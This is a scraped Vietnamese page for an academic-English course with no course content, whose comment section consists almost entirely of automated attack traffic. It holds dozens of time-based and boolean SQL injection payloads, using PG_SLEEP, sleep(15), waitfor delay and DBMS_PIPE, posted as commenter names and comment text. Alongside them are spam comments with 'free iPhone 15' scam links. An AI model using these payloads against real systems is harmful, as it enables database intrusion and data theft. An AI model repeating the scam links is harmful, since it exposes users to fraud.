Nội dung khóa học

Secondary - Tiếng Anh nền tảng học thuật

Đang cập nhật

Bình luận “Secondary - Tiếng Anh nền tảng học thuật

 1. 🎁 Get free iPhone 15: https://google.com 🎁 hs=7aa3b193d1a6f5db97b649ca6c2221a7* viết:
  etv4q5
  1. NJ7NT9SB' OR 930=(SELECT 930 FROM PG_SLEEP(15))-- viết:
   555
  2. oSHU7LZA') OR 890=(SELECT 890 FROM PG_SLEEP(15))-- viết:
   555
  3. D2dn04C6')) OR 29=(SELECT 29 FROM PG_SLEEP(15))-- viết:
   555
  4. MmzHrrdb'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
   555
  5. MmzHrrdb viết:
   nuWmhYFK
  6. MmzHrrdb viết:
   -1 OR 2+845-845-1=0+0+0+1 --
  7. MmzHrrdb viết:
   -1 OR 2+974-974-1=0+0+0+1
  8. MmzHrrdb viết:
   -1' OR 2+102-102-1=0+0+0+1 --
  9. MmzHrrdb viết:
   -1' OR 2+645-645-1=0+0+0+1 or 'GE7IkqUE'='
  10. MmzHrrdb viết:
   -1" OR 2+192-192-1=0+0+0+1 --
  11. MmzHrrdb viết:
   if(now()=sysdate(),sleep(15),0)
  12. MmzHrrdb viết:
   0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  13. MmzHrrdb viết:
   0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  14. MmzHrrdb viết:
   (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  15. MmzHrrdb viết:
   -1; waitfor delay '0:0:15' --
  16. MmzHrrdb viết:
   -1); waitfor delay '0:0:15' --
  17. MmzHrrdb viết:
   1 waitfor delay '0:0:15' --
  18. MmzHrrdb viết:
   1li8okMO'; waitfor delay '0:0:15' --
  19. MmzHrrdb viết:
   -5) OR 131=(SELECT 131 FROM PG_SLEEP(15))--
  20. MmzHrrdb viết:
   -1)) OR 934=(SELECT 934 FROM PG_SLEEP(15))--
  21. MmzHrrdb viết:
   nWjte1Pv' OR 633=(SELECT 633 FROM PG_SLEEP(15))--
  22. MmzHrrdb viết:
   Qoa8NAf9') OR 370=(SELECT 370 FROM PG_SLEEP(15))--
  23. MmzHrrdb viết:
   fUyLsPQa')) OR 325=(SELECT 325 FROM PG_SLEEP(15))--
  24. MmzHrrdb viết:
   555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  25. MmzHrrdb viết:
   555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  26. MmzHrrdb viết:
   @@tWzGw
  27. -1 OR 2+35-35-1=0+0+0+1 -- viết:
   555
  28. -1 OR 2+848-848-1=0+0+0+1 viết:
   555
  29. -1' OR 2+76-76-1=0+0+0+1 -- viết:
   555
  30. -1' OR 2+756-756-1=0+0+0+1 or 'rs6ZkyLH'=' viết:
   555
  31. -1" OR 2+909-909-1=0+0+0+1 -- viết:
   555
  32. if(now()=sysdate(),sleep(15),0) viết:
   555
  33. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z viết:
   555
  34. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z viết:
   555
  35. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ viết:
   555
  36. 1 waitfor delay '0:0:15' -- viết:
   555
  37. bFwYVoN5'; waitfor delay '0:0:15' -- viết:
   555
  38. vIaJuytX' OR 654=(SELECT 654 FROM PG_SLEEP(15))-- viết:
   555
  39. 0CpNvca6') OR 649=(SELECT 649 FROM PG_SLEEP(15))-- viết:
   555
  40. 7dhOtec8')) OR 271=(SELECT 271 FROM PG_SLEEP(15))-- viết:
   555
  41. MmzHrrdb'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
   555
 2. 🎁 Get free iPhone 15: http://moovendharinstitute.com/upload/go.php 🎁 hs=3324e97cd0cec686ef110507ac82ddd9* viết:
  a5g92x
  1. 🎁 Get free iPhone 15: http://saraswathividyalaya.com/upload/go.php 🎁 hs=7aa3b193d1a6f5db97b649ca6c2221a7* viết:
   plffe4
  2. MmzHrrdb' AND 2*3*8=6*8 AND 'gJ7n'='gJ7n viết:
   555
  3. MmzHrrdb" AND 2*3*8=6*8 AND "C2y9"="C2y9 viết:
   555
  4. MmzHrrdb%' AND 2*3*8=6*8 AND 'Nr2V'!='Nr2V% viết:
   555
  5. -1 OR 2+787-787-1=0+0+0+1 viết:
   555
  6. -1 OR 3+787-787-1=0+0+0+1 viết:
   555
  7. MmzHrrdb'||' viết:
   555
  8. if(now()=sysdate(),sleep(15),0) viết:
   555
  9. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z viết:
   555
  10. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z viết:
   555
  11. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ viết:
   555
  12. pIxRcbd6'; waitfor delay '0:0:15' -- viết:
   555
  13. taIkXIiI') OR 231=(SELECT 231 FROM PG_SLEEP(15))-- viết:
   555
  14. QZLzZsBi')) OR 826=(SELECT 826 FROM PG_SLEEP(15))-- viết:
   555
  15. MmzHrrdb'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
   555